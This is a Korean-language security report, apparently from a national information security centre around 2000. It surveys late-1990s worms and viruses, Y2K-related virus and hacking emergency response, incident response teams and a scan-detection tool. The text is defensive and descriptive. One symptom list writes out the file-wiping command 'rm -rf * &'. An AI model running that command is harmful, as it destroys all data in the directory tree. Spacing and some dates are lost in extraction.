111 제 2 절최근바이러스동향및대응 1990년대중반까지의컴퓨터바이러스들은주로도스용바이러스 (crow, alt_x, qq, nambul) 로 PC 통신망을통하여전파되었으며, 그확산속도나피해는그리크지않았다. 하지만 PC 통신망에서의바이러스제작동호회활동과함께바이러스제작잡지까지만들어져보급되기시작하면서바이러스의제작자들의폭발적인증가와새로운악의적인형태의바이러스가계속적으로출현하게되었다. 또한윈도우 95/98이보급되면서새로운형태의바이러스가문제가되기시작하였다. 바로매크로바이러스와윈도우전용바이러스로매크로바이러스는실행파일이아닌문서파일이주공격대상으로마이크로소프트의오피스 (MS Office) 군의문서 (doc, xls, ppt) 들을감염대상으로하고있어전파의가능성과주요문서파괴로큰문제가되기시작하였다. 그리고윈도우 95/98의대중화와함께나타난윈도우전용바이러스들은메모리상주나윈도우실행파일감염의형태를갖기때문에많은피해를주었다. 일부평가용응용프로그램들이바이러스에감염된채 PC 통신망을통해확산되어큰문제가되기도하였다. 최근 (1999년이후 ) 컴퓨터바이러스동향은단순부트바이러스나파일바이러스중심에서보다복잡한형태와특징을갖는웜 (Worm) 바이러스 (Worm/ExploreZip, Worm/PrettyPark.B, Worm/MyPics 등 ) 와웜기능을갖는매크로바이러스 (W97M/Mellisa, W97M/JulyKiller 등 ) 중심으로변해가고있는추세이다. 지난 '99년 4 월 26일 CIH 악성컴퓨터바이러스가국내에많은피해를주어일반사용자들의바이러스에대한경각심은높아졌지만새로운형태의웜바이러스의증가로바이러스에주의가더욱필요하게되었다. 웜바이러스는그특징에따라자기복제와자체메일전송기능, 그리고정보수집기능까지포함한복잡한형태를가지고있기때문에이를막기위해서는사용자들의보다높은바이러스에대한인식이있어야할것이며, 웜의확산방법인메일이나 IRC(Internet Re1ay Chatting) 등에서전송되는파일에대한주의가필요할것이다. 웜바이러스는대부분 E-mai1을통한전파방법을사용하는데시스템에감염이되면이바이러스는 MS Outlook의주소록을찾아서이주소록에있는모든사용자에게자동으로바이러스파일이첨부된메일을보내는방법으로자신을전파시킨다

112 추가적으로최근의웜바이러스들은 IRC를이용한두가지강력한기능을포함하고있다. 첫째는사용자가 IRC Channel에접속하기위한 mirc 같은프로그램의 DCC 설정스크립트를변경시켜사용자가이프로그램을이용하여 IRC에접속하는순간자동적으로접속한 Channel의모든사용자들에게바이러스감염파일을보내사용자들을감염시키는기능이있다.( 최신 mirc와같은 IRC 클라이언트프로그램의경우이러한웜바이러스를막기위한설정기능을가지고있으므로보안설정을하면피해를막을수있다. 하지만최신의몇가지웜바이러스 (W95/Fono 등 ) 들은이러한설정도제거할수있는기능을포함하고있기때문에웜바이러스의전파를막는것이점점더어려워지고있다.) 둘째는바이러스가감염된시스템정보 ( 컴퓨터이름, 제품 key) 와사용자의정보 ( 사용자 Keylog, 사용자이름, 시스템 IP, 패스워드등 ) 를 IRC 서버나 Ftp를통해바이러스제작자에게보내는기능을가지고있다.(PrettyPark.B, Y2KCOUNT, EcoKys) 이렇게보내진시스템과사용자정보를이용하여 2차적인해킹이나공격의가능성이있어심각한문제가될수있다. 1. '99년주요바이러스분석 '99년 11월에는기존의첨부파일을실행시켜야만감염되는웜과달리첨부파일이존재하지않고 E-메일을읽는것만으로도시스템이감염되는최초의웜바이러스인 VBS/Bubble Boy" 출현하였다. 이바이러스의제작자는 ActiveX를제대로제어하지못하는 Microsoft Internet Explore 5의보안취약점 (scriptlet.typelib/eyedog) 을이용하여첨부파일의실행없이도확산이가능한이러한바이러스를제작하였으며, 제작자는이바이러스를연구의목적으로제작한것이라고밝혔다. 다행히도시스템환경과응용프로그램에많은영향을받기때문에국내에유입되지는않았다. '99년 11월에는 EcoKys" 라는트로이목마프로그램을이용해서남의통장에서현금을인출하는사례가발생하였다. 이트로이목마는설치된시스템의사용자가입력하는모든키보드내용을파일로저장하여그파일자체를특정 FTP( 트로이목마제작자의사이트 ) 로전송하는기능이있어비밀번호등의사용자정보가유출될수있으므로그위험성은대단히크다

113 '99년말에는특히 Y2K관련바이러스의유형들이많이등장하였다. 이러한바이러스들에대한자세한정보는제 4장에서다루기로하고여기서는주요바이러스들에대한특징만을살펴보기로하겠다. 99년 12월에는 Y2K관련바이러스의유형 ( 응용프로그램의 Y2K문제해결가장프로그램 ) 과자체적인업데이트기능을포함한 W95/Babylonia" 라는웜바이러스가출현하였다. W95/Babylonia 의새로운특징은자체적인업데이트기능을가지고있다는것으로기존의윈도우트로이목마프로그램들이가지고있던 Plugin에의한 Component 추가와설정조정기능을포함하여새로운바이러스의기능추가가쉬울것이다. 이러한유형은최신해킹기법과결합된바이러스라는점에서더많은피해가예상되며많은변종이발생될우려가있다. 99년 12월에최근유명사이트인 messagemates의새해축하메시지프로그램을가장한 W32/NewApt" 라는웜바이러스 (Y2K 축하프로그램가장바이러스 ) 가출현하였다. 이바이러스는첨부파일이름이임의적으로계속변하며, E-메일의메시지도 2가지로이루어져있어사용자들을혼돈시킬수있는메모리상주형웜바이러스이다. 이바이러스에감염되면시스템에는특별한피해증상이없으며단지, 네트워크속도가느려지는것을발견할수있다. 하지만이속도저하는이웜바이러스의숨겨진공격인마이크로소프트웹서버로의 "ping-bomb" 공격과계속적인전화접속에의한네트워크트래픽증가가원인이된것이다. 이러한특정사이트에대한서비스거부공격방법이바이러스에서도나타나해킹분야의분산환경에서의서비스거부공격 (trinoo와 tribe flood networkt(tfn)) 이라는보안위협과함께세기말적인위협의원인이되었다. 새로운바이러스의유형중눈길을끄는것들로는 VBS(Visul Basic Sctipt) 를이용한바이러스유형으로 Platform에관계없이 VBS를지원하는요즘의모든윈도우시스템에서작동되는 VBS/FreeLink, VBS/BubbleBoy, VBS/TUNE 등의바이러스가많이출현하여위협이되었다. 또한 Hyper Text Markup Language (HTML) 인확장자가.HTM,.HTML,.HTT,.ASP인파일들을감염시키는 Java Script로작성된바이러스 (The Fly, W32/Mix.2048) 들이실제로전파되고있다는것이다. 이미 98년에 HIML.Internal 바이러스가등장하였지만 99년에는더많은수의 HTML 감염바이러스가나타났으며, 실제피해도일으키고있다. 이제는실행파일이나문서파일외에도웹문서를다운받거나보는것 (Browing) 만으로도바이러스가감염될수있기때문에인터넷사용에서더욱주의가필요하게되었다

114 2. 최근바이러스대응책다음으로이러한다양한특성과빠른전파력을갖는최근의바이러스에대한대책을살펴보기로하겠다. 바이러스를예방하기위해서가장중요한것은물론사용자들의바이러스에대한충분한인식일것이다. 바이러스에대한최신정보를빠르게입수하여그에맞는대책을스스로세워나가는것이중요할것이다. 그리고통신상에서의출처가확실하지않은프로그램이나문서다운로드주의와인증되지않은웹사이트접속주의등의기본예방책과함께최신버전으로업데이트된엔진이탑재된백신으로항상시스템을검사해보아야할것이다. 그리고최근의웜바이러스들이특징적으로 과 IRC를통한두가지자체전파기능을포함하기때문에사용자들은다음의두가지수동적인방법으로감염을어느정도방지할수있을것이다. 첫째는최근의웜바이러스들이기본적인확산방법으로감염파일을첨부한 E-메일을사용자에게보내는방법을사용하므로사용자는보내는이가확실하지않은 E-메일의첨부파일은조심해야하며이러한 E-메일은바로삭제하는것이좋을것이다. 둘째는 IRC Channel을통한자체전파기능에대해서는최신의 mirc와같은 IRC 클라이언트프로그램의경우이런웜바이러스를막기위한설정이되어있으므로최신의프로그램을사용하여확산을막을수있을것이다. 그림과같이최신 mirc v5.61의경우기본설정이 Show get Dialog로되어있기때문에 IRC Channel을통해웜바이러스가오면 Dialog를통해확인절차를거치게되므로감염을막을수있다. 하지만앞에서도제시되었던것처럼최신의 IRC를통한웜바이러스는이러한설정기능도바꿀수있는기능을포함하고있기때문에주의가필요하다

115 ( 그림 3-23) mirc 의웜바이러스방지설정 또한 html에 JavaScript 형태로삽입되어전파되는유형의바이러스를예방하기위해서는다음과같이웹브라우저에서 Java 보안설정을해야할것이다. ( 그림 3-24) Netscape 의자바보안설정

116 ( 그림 3-25) Explore 의자바보안설정 악성자바스크립트와자바애플릿의보안대책은다음과같이정리해볼수있다. ㅇ어떤사이트를방문하는지파악할것 ( 인증되지않은사이트방문자제 ) ㅇ사용하고있는자바환경설정을정확히파악할것ㅇ취약성이해결된최신버전의웹브라우저를사용할것ㅇ보안경고 (security alert) 에항상관심을가지고있을것ㅇ중요한정보를보유하고있다면강력한악성코드보안정책사용할것

117 제 3 절국내해킹ㆍ바이러스대응활동현황 1. 국내의침해사고대응팀활동현황 가. 한국정보통신망침해사고대응팀협의회 (CONCERT) CONCERT(CONsortium of CERTs) 는국내정보통신망침해사고대응팀간의정보교류, 기술공유등의협조체제를통하여국내침해사고예방및확산방지를도모함으로써정보통신망의안전한운영에기여하기위하여설립되었다. '99년한해동안 CONCERT에서 5차례에걸친정기기술세미나및워크샵을통한국내정보통신망운영기관및사용기관과의침해사고대응기술정보를교류하였으며, 5월과 7 월에광주및전남지역과경북지역의대학네트워크실무자를대상으로해킹방지세미나를개최하였다. 또한 7월에침입탐지및차단연구회에서의기술세미나등전문연구회활동을통하여 CONCERT 회원기관의해킹대응기술력향상에노력하였다. 그리고, 운영위원회를포함하여총 188개의신규및기존기관이 CONCERT 회원으로가입되어회원기관이증가하고있다. '99년 CONCERT 워크샵및세미나개최현황은아래와같으며발표자료는 CONCERT 홈페이지 ( 에서구할수있다. ㅇ제 3회해킹방지워크샵 '99-뉴밀레니엄과정보보호- - 장소 : 인터콘티넨탈호텔그랜드볼룸 - 일자 : ' ( 월 ) ~ 11.9( 화 ) - 주요내용 : ㆍ향후인터넷및 E-Business 차원의정보보호관리중점강조ㆍ한국정보보호현황, 정보보호기술및활동의역사및현황ㆍ대학네트워크안전운영, 스탠포드대학운영경험및현황ㆍ정보전과 E-Business, 기업의정보보호전략ㆍ아태지역대응팀운영현황 : 호주, 일본, 대만ㆍY2K 문제관련해킹, 바이러스패널토의

118 ㆍ 99 년 CONCERT 총회 ㅇ제 1회 CONCERT 세미나 - 안전진단팀현황 - - 장소 : 한국과학기술원 (KAIST, 대전유성 ) - 일시 : ' ( 금 ) ~ 27( 토 ) - 주요내용 : ㆍ최근해킹기법과침입탐지시스템ㆍ안전진단팀 ( 타이거팀 ) 현황ㆍ패널토의 : CONCERT 안전진단팀연구회운영, 어떻게할것인가? ㅇ제 2회 CONCERT 세미나 - 컴퓨터바이러스방지대응 - - 장소 : 한국과학기술회관 ( 서울, 역삼동 ) - 일시 : ' ( 화 ) - 주요내용 : ㆍ기술적바이러스방지대책ㆍ관리적바이러스방지대책ㆍ해킹및바이러스대응현황ㆍCIH 백신개발및디스크복구방법ㆍ향후바이러스백신개발사업방향ㆍCIH 바이러스대응사례ㆍ패널토의 : 국내바이러스대응체계어떻게할것인가? ㅇ제 3회 CONCERT 세미나 - Linux보안및추진사례 - - 장소 : 서울교육대학전산관 1층교육공학1실 ( 서울서초동 ) - 일시 : ' ( 목 ) - 주요내용 : ㆍ회원기관정보보호추진사례ㆍLINUX 현황및보안ㆍ컴퓨터바이러스대응ㆍCONCERT 사무국활동ㆍ정보보호관련이전기술소개 ㅇ제 4 회 CONCERT 세미나 - 사이버금융해킹방지

119 - 장소 : 금융결제원강당 - 일시 : ' ( 화 ) - 주요내용 : ㆍ인터넷해킹시연ㆍ사이버금융시스템보안추진사례ㆍ전자상거래인증체계이해ㆍ전자상거래법적분쟁과대책ㆍ사이버금융시스템안전운영대책ㆍ해킹방지및안전운영을위한도구활용 ㅇ제 5회 CONCERT 세미나 -사이버쇼핑몰해킹방지 - - 장소 : 숙명여자대학교교수회관 1층수련교수회관회의실 - 일시 : ' ( 목 ) - 주요내용 : ㆍ공개SW 이용안전한시스템보안관리ㆍ리눅스침입차단시스템 (Firewall) 운영ㆍ인터넷전자상거래와인증관리체계ㆍ인터넷모범상정인증제도와보안관리ㆍ인터넷쇼핑몰보안구축지원사례ㆍ대흥기획보안정책및운영사례ㆍ해킹대응과방지기술ㆍ시큐리티컨설팅사업현황과전망ㆍ전문컨설팅기업현황발표ㆍ시큐리티컨설팅문제점과방향 나. 한국정보통신망침해사고대응지원팀 (CERTCC-KR) CERTCC-KR(KOREA Computer Emergency Response Team Coordination Center) 은한국정보보호센터내의침해사고대응팀으로서, 국내에서운영되고있는전산망의침해사고대응활동을지원하고, 전산망운용기관등에대해통일된협조체제를구축하여, 국제적침해사고대응을위한단일창구를제공하기위하여설립되었다. CERTCC-KR에서는 '99년 572건의해킹사고를접수받아국내피해기관에해킹경로, 보안취약점분석, 보안대책자문등기술지원을하였다

120 또한최신해킹기술및이에대한보안기술을시험분석하여 10건의기술분석서를보급하였으며, 보안취약점정보및패치정보를신속하게전파하기위한기술권고문 (Korea Advisory) 을 69건작성하였다. 그리고, '99년부터새로이국내피해시스템을분석하는과정에서발견되는주요시스템침해사고에대해서는사고노트를작성하여긴급히메일링리스트및홈페이지를통하여전파하고있다. 다. 국제침해사고대응팀협의회 (FIRST) 활동 FIRST(Forum of Incident Response and Security Teams) 는비영리기구로서, 회원기관으로서대학, 정부기관, 대규모네트워크보유기업등의대응팀들과정보시스템개발업체, 그리고정보보호전문가들로구성되어있다. CERTCC-KR은 98년 1월에회원으로가입하여활동하고있다. '99년 FIRST 컨퍼런스가 ' ( 일 ) ~ 6. 20( 일 ) 에걸쳐호주브리즈번에서개최되었으며 200여명의 FIRST 회원기관실무자들이참석하였다. CERTCC-KR에서도참석하여 FIRST 정기총회 (Annual General Meeting) 에한국대표대응팀으로참석하였으며, CERTCC-KR에서개발한침해사고대응관련논문과 AP 국가대응팀관련패널토의및현황을발표하였다. 또한 FIRST에가입된회원기관간에해킹사고에대한정보를교환하고정보통신망침해사고에대한공동대응체계를구축하고있다. FIRST의회원기관중의하나인 CIAC에서 '99년 11월검거된해커를수사하는과정에서발견된국내 179개시스템에대한정보를제공하여줌으로써국내피해시스템의복구에중요한자료가되기도하였다

121 제 4 장 Y2K 관련바이러스및해킹대응활동현황

122 제 4 장 Y2K 관련바이러스및해킹대응활동현황 제 1 절개요최근에 Back Orifice 2000 해킹도구및 Y2KCOUNT 등의컴퓨터바이러스가국내에유입됨에따라 Y2K로인한오류와일반적인해킹, 컴퓨터바이러스등에사안발생시이에대한혼동을방지하고 Y2K 문제발생시점을기해 Y2K오류와해킹및컴퓨터바이러스사고에대해국내피해를최소화하기위한대비책을수립할필요가있었다. 또한새천년전환시점 ( ~ ) 이전까지국내외적으로 Y2K관련바이러스및해킹사고와관련하여미국의경우, Y2K 문제해결을위하여아웃소싱한외국업체가제출한시스템내에트로이목마, 백도어프로그램을고의적으로설치하여추후정보유출등범죄적목적으로활용할가능성이검토되었으며, 특히 99년 10월캐나다밴쿠버에서개최된 Virus Bulletine 국제회의에서백신업체들은바이러스사고는 Y2K오류와는별개의문제로취급하고있었으며, Y2K관련출현가능한바이러스ㆍ해킹발생유형에대한조사ㆍ분석을실시하고있었다. 이에따라일반적인컴퓨터사용자가 Y2K오류로위장한단순해킹사고및컴퓨터바이러스사고로부터사전에예방ㆍ조치할수있도록대국민홍보활동및정보통신부 Y2K 정부종합상황실과연계하여국내백신업체 (4개), 백업ㆍ복구ㆍ방역서비스업체 (5개), 망사업자 (6개) 등의전문가로구성된비상대응반과한국정보보호센터내에 Y2K관련바이러스ㆍ해킹비상대응상황실을중심으로신속하게 Y2K관련바이러스및해킹사고에신속한대응활동을통해새천년전환시기에국내에서큰사고가없었다

123 제 2 절 Y2K 관련바이러스대응활동 1. Y2K 관련출현가능한컴퓨터바이러스유형분석 ㅇ새천년 (Y2K) 을기념하여축하카드기념카드형태의전자메일을통해전파되면서전자메일을읽거나첨부파일을실행시동작하는 2000년기념바이러스 Happy99(99년기념 ), Worldcup( 월드컵기념 ) 등 ㅇ Y2K문제해결을위한유틸리티, 패치등으로위장하여컴퓨터사용자에게전달되어실행시동작하는 Y2K 문제해결을위장한바이러스 Y2KCOUNT(MS사에서제공한 2000년카운트시계인것으로위장 ), W32/Fix(Y2K 패치를가장한바이러스 ) 등 ㅇ문제없는사용자시스템에 Y2K문제가있다는등다양한내용의메일이나공지기능을통해사용자들을혼란에빠뜨릴수있는거짓바이러스 (Hoax) Disney Hoax, Ghost, AI.D.S. Hoax 등 ㅇ Y2K문제를해결하기위해설치한유틸리티나패치등을대상으로공격하여이를제거혹은변형함으로써 Y2K문제해결프로그램을공격하는신종바이러스 ㅇ광범위한전파속도를갖고해킹과결합된형태로사용자정보유출을노리거나시스템의날짜를변경하는공격으로문제를야기시키는신종바이러스 PrettyPark, Dropper/Ecokys, Back Orifice 2000, Sub 7 등 ㅇ기존바이러스의변형으로바이러스의활동일자를변형하여잠복기간을거친후 2000 년전환시점에출현하도록한기존바이러스의변종 예루살렘 (13일금요일 매주금요일 ), CIH(4/26 매월 4/26), Zerotime( 매주금요일 ) 등

124 2. Y2K 문제와바이러스ㆍ해킹문제구별지침보급 Y2K 문제발생시기를기하여예측되는단순한바이러스및해킹문제도 Y2K 문제로과장되어국가사회및국제적으로도매우큰혼란을야기할가능성이있으므로 Y2K 문제와단순한바이러스ㆍ해킹문제를구별할수있는지침을작성할필요성이대두됨에따라 Y2K 문제와바이러스ㆍ해킹사고발생시피해증상에따라 Y2K문제, 바이러스ㆍ해킹문제를명확히구분하여바이러스ㆍ해킹안전운영지침서등에이를반영하여대국민홍보를통해긴급상황이발생하였을경우각사안에따른대응토록하였다. 가. Y2K 문제와바이러스ㆍ해킹문제구별가이드 [ 표 4-1] Y2K 문제와바이러스ㆍ해킹문제구별방법 구분피해유형별증상해결방안 Y2K 문제 바이러스문제 해킹문제 ㅇ하드웨어의경우, RTC(Real Time Clock) 의두자리연도처리로인한 BIOS 의 CMOS 세기정보처리오류로시간출력오류발생ㅇ소프트웨어의경우, 두자리연도처리로인해정렬ㆍ검색ㆍ비교연산오류및오동작ㆍ무한루프ㆍ수행정지현상발생가능 ㅇ Y2K 거짓정보에의한바이러스감염확산ㅇ CIH 등악성바이러스에의한시스템ㆍ데이터파괴및 Flash BIOS 파괴로인한시스템부팅불능ㅇ멜리사, ExploreZip 등 E 메일자동전송ㅇ PrettyPark, EcoKys 등사용자정보유출ㅇ시스템ㆍ프로그램속도저하, 프로그램오류, 비정상적인내용출력등단순바이러스에의한피해증상ㅇ바이러스도 Y2K 문제를내포하고있음 ㅇ백오리피스 2000 등윈도우트로이목마에의한피해발생가능성ㅇ UNlX 서버에서의자료파괴ㆍ변조와개인정보유출, 악성프로그램설치등 - CMOS 세기정보 ('20'), RTC 연도정보 ('00') 교정 - Y2K 문제해결된 OS 업그레이드및패치프로그램설치, 응용프로그램의 Y2K 문제해결 - 백업등바이러스예방및백신 SW 사용 이전주요정보백업 - 일반해킹방지방법과같이보안설정과패치를통해대응 구분방안 ㅇ Y2K 오류의경우, 2000 년이라는년도와관계된시스템, 프로그램에동작오류발생ㅇ바이러스ㆍ해킹의경우, 연도와관계없이시스템파괴, 정보유출, E 메일자동전송, 시스템정지, 부팅불능, 자료변조, 루트권한도용등피해증상이나타남 바이러스의경우, Y2K 관련출현가능한유형을분석하여예방조치 Y2KCOUNT 등 Y2K 위장, Back Orifice2000 등 Y2K 관련해킹사고에대응함

125 나. Y2K 문제발생시현상 ㅇ하드웨어 - 현재시판된대부분의 PC는 RTC(Real Time C1ock) 라불리우는시계가내장되어있는데, 이 RTC가두자리연도밖에는처리하지못하며세기정보를별도의 CMOS에저장함 - BIOS가 RTC의두자리연도를참조하여 CMOS 내의세기값을보정 (RTC 연도가 00 일경우 CMOS 세기를 20으로바꿈 ). 따라서, PC 하드웨어의 Y2K 문제는 BIOS의 CMOS 보정여부에달렸음 년이되어도 CMOS 내세기값이 20으로바뀌지않으면연도를 1900년으로인식하는 Y2K 문제가발생함 - PC의경우, ROM BIOS에서날짜정보처리시시스템날짜ㆍ시간출력에오류발생 '96년이전에제작된 486이하 PC기종에서발생가능함 - UNIX 서버의경우, OS 자체와시스템유틸리티의날짜정보처리시시스템날짜ㆍ시간출력에오류가발생하여서버와시스템시간을이용하는서비스에오류발생 getdate(), strptime() 시스템명령어, date, get 등의명령어를포함한시스템유틸리티등 - 네트워크장비의경우, 운영관련 OS 및 NMS 등의내장프로그램의날짜정보처리오류로서비스에문제가발생 라우터, 네트워크스위치, 게이트웨이, 브리지, 교환기등 ㅇ소프트웨어패키지소프트웨어나응용프로그램에서연도처리시두자리연도만을사용하도록설계된경우정렬, 검색, 비교등의연산에오류가발생함 DBMS의경우, sysdate" 명령어실행시 2자리연도가리턴문제등 - 연도오류가사용프로그램의버그와연결될경우오동작, 무한루프, 수행정지등의현상이발생할가능성도있음

126 다. 일반적인바이러스감염증상 ㅇ CIH 등바이러스피해증상 - 파일변형ㆍ삭제, 하드디스크파괴 - 시스템다운 - Flash BIOS 파괴로인한부팅불능 - 플로피 / 하드디스크 /CD-ROM 인식불가 ㅇ ExploreZip, PrettyPark 등인터넷웜피해증상 - E 메일자동전송 - 개인정보유출 ㅇ기타단순바이러스피해증상 - 비정상적인내용출력 - 프로그램실행에러 - 일반프로그램실행속도저하 - 메모리부족현상발생 라. 일반적인해킹사고발생시피해증상 ㅇ PC의경우 - 메모리의가용량감소 - 시스템의비정상적인다운 - E 메일자동전송 - 비정상적인포트통한접속증가및개인정보유출 ㅇ UNIX 서버의경우 - rm -rf * & 등의명령어로하드디스크내에모든파일및디렉토리를삭제

127 - 컴퓨터에존재하는상용 PC통신 ID를이용하여무료사용 - 사용자들의 E메일내용이나디렉토리내자료열람, 빼내기 - 바이러스, 트로이목마, 백도어등악성프로그램설치 - 성적조작, 홈페이지내용변조등주요자료변조 마. Y2K 문제와컴퓨터바이러스ㆍ해킹의발생차이점인지방법ㅇ Y2K 문제의경우, 년도ㆍ시간에관련된데이터를시스템이나응용프로그램에서사용할때날짜정보와관련되어시스템및프로그램동작오류가발생됨ㅇ바이러스의경우, 연도정보와상관없이디스크및데이터파괴, 시스템정지, 시스템부팅불능, E 메일자동전송, 사용자정보유출등ㅇ해킹문제의경우, 공격목표시스템및정보수집, 불법적인컴퓨터접근, 악성프로그램설치로인한비인가자의불법관리자권한획득, 시스템의취약점을이용하여스니퍼ㆍ백도어등의해킹도구로직접적인시스템피해등 3. Y2K관련바이러스해킹비상대응체계구축ㆍ운영비상대응기간 ( ~ ) 중에 Y2K관련바이러스ㆍ해킹사고등긴급상황발생시에신속히대처하기위해비상연락망을구축하여사고접수ㆍ기술지원등대응업무를수행하는비상대응체계를구성하여한국정보보호센터, 국내백신업체의바이러스신고센터를통해대국민으로부터접수받은국내에유입된 Y2K 바이러스샘플을 Y2K관련바이러스ㆍ해킹방지연구반의전문가등이분석하고한국정보보호센터의바이러스비상연락망을통하여신속한대응방안및긴급정보등을배포하고국내피해집계중앙분석, Y2K를위장한바이러스ㆍ해킹사고발생시기존의한국정보보호센터침해사고대응지원팀 (CERTCC-KR) 을통하여사고원인분석, 피해분석, 침입경로분석등의기술지원, 국제침해사고시 FIRST, APSIRC와연계한공동대응체계구축, 검찰청ㆍ경찰청수사조직과연계하여범죄성바이러스ㆍ해킹사고발생시협력체계구축등의대응활동을수행하였다. 한국정보보호센터내의 Y2K관련바이러스해킹비상대응상황실에서 Y2K 전환기간중에대응한활동현황은다음과같습니다

128 가. Y2K관련바이러스ㆍ해킹비상대응반구축및운영 o Y2K관련바이러스ㆍ해킹문제시험분석과연구, 거짓정보및거짓정보등을신속히조사ㆍ분석하여사고예방을위한기술지원및거짓정보등긴급상황시대응방안을마련함 Y2K 정부종합상황실, 국가정보원, 검ㆍ경수사기관, 한국정보보호센터 Y2K관련바이러스ㆍ해킹비상대응상황실, PC 통신사업자 (6개), 백신업체 (4개), 백업ㆍ복구ㆍ방역서비스업체 (5개) 등으로구성 [ 표 4-2] Y2K 관련바이러스ㆍ해킹비상대응반참여기관현황 기관명역할비고 정보통신부 (Y2K 상황실 ) 국가정보원 ( 정보보안 119) 대검찰청 ( 정보범죄수사센터 ) 경찰청 ( 컴퓨터범죄수사대 ) 한국정보보호센터 ( 비상대응상황실 ) 시만텍코리아 안철수컴퓨터바이러스연구소 트랜드코리아 하우리 명데이터복구센터 씨앤씨 소프트랜드 Y2K 관련 13 대중점대상기관관리및연계 바이러스ㆍ해킹대응관련정부기관관리및연계 바이러스ㆍ해킹사고등컴퓨터범죄수사 Y2K 관련바이러스ㆍ해킹비상대응반운영 신종바이러스시험분석및백신개발 데이터복구기술지원 백신업체 복구업체 지오이네트데이터백업기술지원백업업체 에스원 나우콤 ( 나우누리 ) SK 텔레콤 ( 넷츠고 ) 삼성 SDS( 유니텔 ) LG 인터넷 ( 채널아이 ) 데이콤 ( 천리안 ) KT 하이텔 ( 하이텔 ) 상황전파및가입자대상방지대책보급 상황전파및가입자대상방지대책보급 바이러스방역서비스업체 망사업자

ㅇ국내외신종출현바이러스및해킹기법등을입수하고대응방안등을시험분석ㆍ연구하여최신방지대책등을한국정보보호센터및 Y2K 종합상황실홈페이지를통하여보급ㅇ Y2K 중점대상기관및공공기관을대상으로 2000. 1.

129 ㅇ국내외신종출현바이러스및해킹기법등을입수하고대응방안등을시험분석ㆍ연구하여최신방지대책등을한국정보보호센터및 Y2K 종합상황실홈페이지를통하여보급ㅇ Y2K 중점대상기관및공공기관을대상으로 에발생가능한바이러스및해킹사고에대하여요청시취약점점검및해킹시도탐지등을기술지원ㅇ의심스러운 Y2K, 해킹ㆍ바이러스관련정보를조사및분석하여 Y2K 종합상황실, 한국정보보호센터홈페이지에거짓정보및거짓경보에대한분석자료를신속히등재하고유관기관및경보체계에상황전파ㅇ Y2K 관련신종바이러스국내유입에대한긴급대응하기위하여국내백신업체의협조하에대국민대상의백신 SW 무료공급및국내백신업체, 백업ㆍ복구업체등과공동협력하여데이터및시스템복구기술지원 ( 그림 4-1) Y2K 관련바이러스ㆍ해킹비상대응체계도

나. Y2K관련바이러스해킹비상대응상황실운영ㅇ비상대응상황실운영기간 (1999.12.15 ~ 2000.1.15) - 準비상대기 : 99년 12월 15일 ( 수 ) ~ 12월 26일 ( 일 ) - 비상대기 : 99년 12월 27일 ( 월 ) ~ 2000년 1월 4일 ( 화 ) 24시간상황관리시스템 (http://www.y2kvirus.or.

130 나. Y2K관련바이러스해킹비상대응상황실운영ㅇ비상대응상황실운영기간 ( ~ ) - 準비상대기 : 99년 12월 15일 ( 수 ) ~ 12월 26일 ( 일 ) - 비상대기 : 99년 12월 27일 ( 월 ) ~ 2000년 1월 4일 ( 화 ) 24시간상황관리시스템 ( 및비상대기요원운영 - 準비상대기 : 2000년 1월 5일 ( 수 ) ~ 2000년 1월 15일 ( 토 ) 향후비상대응반은상시대응체계로전환운영ㅇ비상대응상황실홈페이지운영 - 공지사항및 Y2K 관련바이러스ㆍ해킹자료실 - Y2K 관련컴퓨터바이러스ㆍ해킹사고신고접수 - Y2K 관련컴퓨터바이러스ㆍ해킹에관한분석자료 DB - Y2K관련컴퓨터바이러스ㆍ해킹피해접수상황통계 ( 그림 4-2) 비상대응상황실관련홈페이지화면

131 ㅇ Y2K 관련바이러스ㆍ해킹접수처리흐름도 ( 그림 4-3) 비상대응상황실대응업무절차 다. 비상대응상황실대응활동현황ㅇ '99.11, 한국정보보호센터 Y2K관련바이러스ㆍ해킹대응책마련과비상대응반대응활동개시

132 [ 표 4-3] 비상대응상황실대응활동실적 일자주요내용비고 홈페이지개설 비상대응반, 자회의개최 1 차실무 ㅇ신고접수처리절차협의ㅇ비상대응반보도방안협의등 차보도자료배포 Y2K 관련바이러스ㆍ해킹방지비상체제돌입 12.6 대국민신문광고 전자신문, 동아일보, 조선일보등 12.7 관련설명회개최, 해킹탐지서비스개시 상공회의소, 600 여명참석 CD-ROM, 지침서등배포 바이러스모의훈련 418 개기관대상, 56 개기관감염등 비상대응상황실개시 상황관리시스템운영 비상대응반, 2차실무ㅇ신고접수양식등확정자회의개최ㅇ 2차모의훈련협의 차보도자료배포 Y2K 관련해킹취약점점검서비스개시 차보도자료배포 제2차 Y2K관련바이러스모의훈련실시 차보도자료배포 CIH 변종, 신종바이러스 WIN95/LOVE 발견, 유닉스를노리는밀레니엄웜 (Millennium Worm) 국내발견 ' Y2K 전환시점현황보고 해외바이러스해킹사고없음, 국내사고무 ' 차보도자료배포 Y2Kaos, XTCP 등신종바이러스발견 ' ' MyPics 경보관련홍보 6 차보도자료배포 Mypics 국내피해확산 (4 개방송, 주요신문 ) 비상대응기간 Y2K 관련바이러스ㆍ해킹신고접수결과 - 큰피해없이상황종료, 하지만지속적인대응책마련필요 ㅇ Y2K관련바이러스신고접수및백신업체전달, 신종바이러스긴급경보및사전예보조치

133 [ 표 4-4] 바이러스신고접수현황

134 제 3 절 RTSD, K-COPS 현황 1. RTSD 현황 가. 네트워크취약점검색공격해커들은실제해킹공격을하기전에네트워크상의모든시스템의보안취약점을알아내는스캐닝공격을시도한다. 이러한스캐닝공격을위한도구로는 ' 최신보안취약점을찾아주는 'mscan' 과 'sscan' 이라는스캔도구가대표적이다. 네트워크스캐닝도구는해킹가능한취약점을찾아낼뿐실제해킹공격을수행하지는않지만, 대부분의해킹공격에서공격자는네트워크스캐닝을통하여발견한취약점을공격하게된다. 즉, 네트워크취약점스캐닝은시스템침입을위해가장먼저수행하는공격의하나이며, 공격자는보안취약점이발견될경우해당취약점을공격하여시스템으로의침입을시도하게된다. 따라서이러한네트워크취약점스캐닝공격을탐지하여대응함으로서사전에해킹방지효과를얻을수있다. RTSD는이러한검색공격을초기에발견하고침입을예방하기위하여네트워크취약점검색공격을실시간으로분석ㆍ탐지하고대응할수있는도구로개발되었으며, CERTCC-KR 홈페이지를통하여일반에게공개하여여러기관에서설하하여사용할수있도록하고있다. 또한 RTSD를이용하여 Y2K 기간동안일어날수있는국내의정보통신시스템에대한해킹공격시도현황을파악하고대응하였다. 나. RTSD 시스템개요전체시스템은네트워크취약점검색공격을탐지하는 실시간검색탐지시스템 (Real Time Scan Detector Agent)" 